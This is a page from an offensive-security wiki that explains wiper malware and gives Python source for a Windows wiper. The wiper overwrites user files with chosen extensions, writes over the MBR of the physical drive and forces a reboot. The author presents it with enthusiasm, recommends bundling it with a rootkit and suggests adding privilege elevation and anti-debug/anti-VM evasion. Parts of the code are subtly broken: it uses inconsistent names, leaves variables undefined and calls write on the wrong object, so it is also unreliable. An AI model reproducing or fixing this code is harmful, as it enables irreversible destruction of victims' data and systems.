search

Wipers

A wiper is a class of malwarearrow-up-right intended to erasearrow-up-right (wipe, hence the name) the hard drivearrow-up-right of the computer it infects, maliciously deleting data and programs.

Simply put, a wiper just straight up removes EVERYTHING on a system, thus "disabling" the system. I found thisarrow-up-right awesome article by @0xf00Iarrow-up-right that I'll be using as my main reference for this. This malware works in 4 primary stages:

  1. Destroy files content

  2. Destroy MBR

  3. Remove self

  4. Shut it down!

Let's look at a simple python wiper. Assuming that you got a rootkit to pack with this sucker, here's a simple program to wipe all things off of a windows system:

import os 
import subprocess
import ctypes
from ctypes import wintypes
import win32api


startupinfo = subprocess.STARTUPINFO() #type: ignore 
drives = win32api.GetLogicalDriveStrings()
kernel32 = ctypes.WinDLL('kernel32')


def OverWriteMBR(): 
    hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001 | 0x00000002, None, 3, 0,0) # Create a handle to our Physical Drive
    Kernel32.WriteFile(hDevice, Data, None) # Overwrite the MBR! (Never run this on your main machine!)
    Kernel32.CloseHandle(hDevice) # Close the handle to our Physical Drive!
    
def SetFiles():
    ext = [
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
           ".gif", ".txt", ".jar", ".sql", ".bundle",
           ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"] # files to seek out and overwrite
    for dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"): 
        for f in files:
            path = os.path.abspath(os.path.join(dirpath, f))
            if f.endswith(tuple(ext)): 
                with open(f, "rb") as files:
                    data = files.read()
                    files.close()
                    with open(f, "wb") as files:
                        data.write(b'\x00') # Overwrites multiple files with zero bytes (hex 00)
                        data.close()                             


def SysDown():
    # InitiateSystemShutdown()  
    os.system("shutdown -t 0 -r -f ") 

def main():
        global application_path 
        if getattr(sys, 'frozen', False):
            application_path = sys.executable
        else:
            application_path = os.path.dirname(os.path.abspath(__file__))

            SetFiles()
            OverWriteMBR()
if __name__ == "__main__":
    main()
    SysDown()

Simple as that! Run this as admin and it'll remove everything including the MBR. Neat right? Well, it's not very effective, but you can add a whole bunch of stuff to make it even better! (I'll once again be yoinking some code from the exalted @0xf00Iarrow-up-right 's skywiper repo...)

For example, you can add a checking mechanism that checks if the program is being run with elevated privileges:

Maybe some function to run the thing as admin:

Some anti-debug/anti-vm magic never goes wrong:

You can include calls to all this stuff in the main() function and you'll have an even better wiper! Alas, good wipers are far too complicated, and it's best if I leave it here. I'll try to make one such and put it up here in the future (no guarantees though!). Please feel free to reach out and ask about this stuff if you need to~

hashtag
References

PreviousKeyloggersNextScreenJackers

Last updated